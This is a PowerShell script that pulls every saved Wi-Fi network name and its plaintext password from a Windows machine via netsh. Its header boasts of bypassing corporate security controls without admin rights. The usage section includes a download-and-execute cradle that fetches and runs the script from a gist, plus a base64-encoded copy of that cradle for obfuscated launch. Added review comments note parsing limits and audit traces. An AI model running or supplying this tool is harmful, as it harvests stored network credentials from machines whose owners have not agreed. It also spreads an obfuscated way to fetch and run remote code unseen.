Simple script to extract locally-stored Wi-Fi Credentials
#====================================#
# Extract Wi-Fi Credentials #
# greg . foss @ owasp . org #
# v0.1 -- July, 2017 #
#====================================#
# Licensed under the MIT License
<#
.Synopsis
Simple script that extracts Wireless Network information and displays it in an easy-to-read way
Does not require administrative rights
Bypasses standard Windows Corporate Security Controls (restrictions on viewing plaintext credentials via the GUI)
.Usage
Local:
PS: C\> Import-Module Extract-WiFi-Creds.ps1
Show All credentials:
PS: C\> Extract-Wifi
Show Particular Network Details:
PS: C\> Extract-Wifi <SSID>
Download and Execute:
Plain:
PS: C\> IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/gfoss/c6a594d868d7a3efbc21b582aef32c3c/raw/4103fcc20fef5630e931d27445542bbb6bf44917/Extract-WiFi-Creds.ps1'); Extract-Wifi
Encoded:
PS: C\> powershell -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBnAGYAbwBzAHMALwBjADYAYQA1ADkANABkADgANgA4AGQANwBhADMAZQBmAGIAYwAyADEAYgA1ADgAMgBhAGUAZgAzADIAYwAzAGMALwByAGEAdwAvADQAMQAwADMAZgBjAGMAMgAwAGYAZQBmADUANgAzADAAZQA5ADMAMQBkADIANwA0ADQANQA1ADQAMgBiAGIAYgA2AGIAZgA0ADQAOQAxADcALwBFAHgAdAByAGEAYwB0AC0AVwBpAEYAaQAtAEMAcgBlAGQAcwAuAHAAcwAxACcAKQA7ACAARQB4AHQAcgBhAGMAdAAtAFcAaQBmAGkA
#>
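function Extract-Wifi {
    # Prints saved WLAN profile information by shelling out to netsh.exe.
    #   -network <SSID> : emits netsh's full output for that one profile, requested with key=clear.
    #   no argument     : lists every saved profile name next to the "Key ..." value netsh reports for it.
    # Banners and the SSID/key table are written with Write-Host (console only); the raw netsh
    # output in the single-profile branch goes to the output stream.
    # NOTE(review): names and keys are scraped by matching the English strings "All", "Key" and
    # "Index" and splitting on ":" -- localized netsh output, or an SSID/key that itself contains
    # ":", will not parse cleanly.
    # NOTE(review): every lookup is a netsh.exe invocation with key=clear on its command line,
    # which is the string process-creation / command-line auditing would record for this function.
    [CmdLetBinding()]
    param( [string]$network )

    $rule = "==================================="

    if ( $network ) {
        # Single-profile mode: hand the requested name straight to netsh and show everything it returns.
        Write-Host ""
        Write-Host ""
        Write-Host "Wireless Network Details:" -ForegroundColor Cyan
        Write-Host $rule -ForegroundColor Gray
        netsh.exe wlan show profiles name=$network key=clear
        Write-Host $rule -ForegroundColor Gray
        Write-Host ""
    } else {
        # Enumerate profiles: keep the lines containing "All", split them on ":" and drop the
        # label halves, leaving the trimmed profile names.
        $profileLines = netsh.exe wlan show profiles key=clear | findstr "All"
        $ssidList = @($profileLines.Split(":") | findstr -v "All").Trim()

        Write-Host ""
        Write-Host ""
        Write-Host "Wireless Networks and Passwords" -ForegroundColor Cyan
        Write-Host $rule -ForegroundColor Gray
        Write-Host ""
        # The original had no space before -ForegroundColor, so the switch was glued onto the
        # header text instead of being bound as a parameter.
        Write-Host "SSID : Password" -ForegroundColor Gray

        foreach ( $ssid in $ssidList ) {
            try {
                # Keep the "Key ..." line of the profile but not the "Key Index" line.
                $keyLine = netsh.exe wlan show profiles name=$ssid key=clear | findstr "Key" | findstr -v "Index"
                # Presumably the catch below fires here: with no matching line $keyLine is empty
                # and the .Split() call fails -- confirm on a profile without a stored key.
                $keyValue = @($keyLine.Split(":") | findstr -v "Key").Trim()
                # Disabled fallback kept from the original: show the "Auth" line when no key was found.
                #if ( -Not $password ) {
                # $password = netsh.exe wlan show profiles name=$ap key=clear | findstr "Auth"
                # $passwordDetail = "$password"
                #}
                Write-Host "$ssid" -NoNewline
                Write-Host " : " -NoNewline
                Write-Host "$keyValue" -ForegroundColor Green
            } catch {
                Write-Host "Unable to obtain password for $ssid - Likely using 802.1x or Open Network" -ForegroundColor Red
            }
        }

        Write-Host ""
        Write-Host $rule -ForegroundColor Gray
        Write-Host ""
    }

    # Best-effort removal of variables (the retrieved key strings among them) before returning;
    # -EA 0 silences the errors from variables that cannot be removed.
    # NOTE(review): confirm which scopes this actually clears.
    Get-Variable | Remove-Variable -EA 0
}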